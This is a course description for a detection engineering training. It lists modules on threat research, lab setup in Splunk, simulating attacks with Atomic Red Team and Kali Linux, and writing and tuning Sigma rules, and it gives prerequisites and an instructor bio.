Detection Engineering is a new approach to threat detection. It contains more than only writing detection rules. Detection Engineering is a process which produces high quality detection rules. Developing good detection rules requires detailed understanding of tactics, techniques and procedures (TTP) of attackers. These TTPs are executed within a lab environment in order to generate telemetry data containing the attack. In the next step, we identify the malicious behavior within this dataset and turn them into resilient high quality detections.
In this training you will learn how to master this process of developing high quality detection rules. The focus will be geared towards detection engineering and detection rule development for Windows and Linux endpoints. The training is not limited to a specific SIEM vendor as we will use the generic and open detection rule format Sigma. Sigma detections developed in this course can be converted into any SIEM or EDR technology and used in your environment.
Detection Engineering Process
Detection Objective and Threat Research based on the Mitre ATT&CK Matrix
Building a Detection Engineering Lab Environment in Splunk
Executing Attacks using Atomic Red Team and Kali Linux
Developing Detections using Sigma
Detection Testing and Detection Tuning
Student Requirements / Course Prerequisites
A laptop with a browser (Firefox is preferred). The labs are hosted in the cloud and are accessed over the browser.
This course is for anyone interested in detection engineering and detection development especially Security Analysts, Detection Engineers, Security Engineers, Red and Purple Teamers.
Patrick Bareiss is a passionate security researcher in the field of threat detection. He combines his knowledge in security engineering with his software development experience to create powerful tools that support detection engineering. He is a frequent speaker at security conferences such as RSA APAC, x33fcon, EU ATT&CK, DeepSec Vienna, Blackhat Europe and many more.